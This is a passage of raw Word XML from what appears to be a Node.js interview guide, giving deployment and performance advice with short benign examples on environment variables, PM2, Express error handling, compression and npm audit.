    <w:p w14:paraId="2BFDF9A7"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subscribe: () =&gt; pubsub.asyncIterator(['MESSAGE_ADDED']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495F4F83"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687A383E" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC92B1" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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4243366B" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EA44AA" w14:textId="77777777" w:rsidR="00E40D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc178383235"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q50. What are some best practices for deploying Node.js applications, and how can Node.js be optimized for performance?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="7EC1888D" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Prepare for Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A08108" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Environment Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use environment variables to manage configuration settings for different environments (development, staging, production). Avoid hardcoding sensitive information in your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076765EA"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lastRenderedPageBreak/>
        <w:t>export NODE_ENV=production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD72A3"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export DB_HOST=localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3ACA3"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export DB_USER=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43629F63" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>export DB_PASS=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39897F51" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Application Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that NODE_ENV is set to "production" to enable production optimizations and disable development-specific features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE624E8" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Use Process Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22DA5C" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process Managers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use process managers like PM2 or forever to manage your Node.js application. These tools help with process monitoring, auto-restart, and load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A42B18"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npm install -g pm2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F15F829" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pm2 start app.js --name "my-app"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DDF876" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring and Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Set up monitoring and logging to track application performance and errors. Tools like PM2 provide built-in logging, and external services like Loggly, Sentry, or New Relic can be integrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691B037" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Handle Application Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2216A8" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement robust error handling in your application. Use middleware in frameworks like Express to catch and handle errors gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F7AED"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app.use((err, req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBA214"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B593C9"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res.status(500).send('Something broke!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F35A89" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3"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42E535C7" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uncaught Exceptions and Rejections</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Handle uncaught exceptions and unhandled promise rejections to prevent the application from crashing unexpectedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C1C426"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EC544"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console.error('Uncaught Exception:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3284EA"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process.exit(1); // Exit after handling the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6021DC39"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A6109" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F394014"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125C26BF"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xml:space="preserve">  console.error('Unhandled Rejection:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74471AF1" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E17A2C" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Optimize Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318D61A" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement caching strategies using tools like Redis or in-memory caching to reduce the load on your database and improve response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADAA7C5" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>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 Use load balancers to distribute incoming traffic across multiple instances of your Node.js application, improving scalability and reliability. Tools like Nginx or cloud-based load balancers (e.g., AWS ELB) are commonly used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51630203" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compression</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enable compression for HTTP responses to reduce the amount of data transferred over the network. Middleware like compression in Express can be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9298EC" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3"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const compression = require('compression');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46016C47" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>app.use(compression());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3B1C4" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Minification and Bundling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Minify and bundle your JavaScript and CSS files to reduce the size of assets sent to the client. Tools like Webpack or Gulp can help with this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E77B1B" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Secure Your Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A788D" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Serve your application over HTTPS to ensure data encryption and security. Use SSL/TLS certificates from providers like Let's Encrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F8679" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Environment Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Keep sensitive information (e.g., API keys, database credentials) in environment variables rather than hardcoding them in your source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6B435" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Input Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Validate and sanitize user inputs to protect against security vulnerabilities such as SQL injection and cross-site scripting (XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C56CF" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly update your dependencies to patch known vulnerabilities. Use tools like npm audit to check for security issues in your dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30215C6D" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE39B11" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
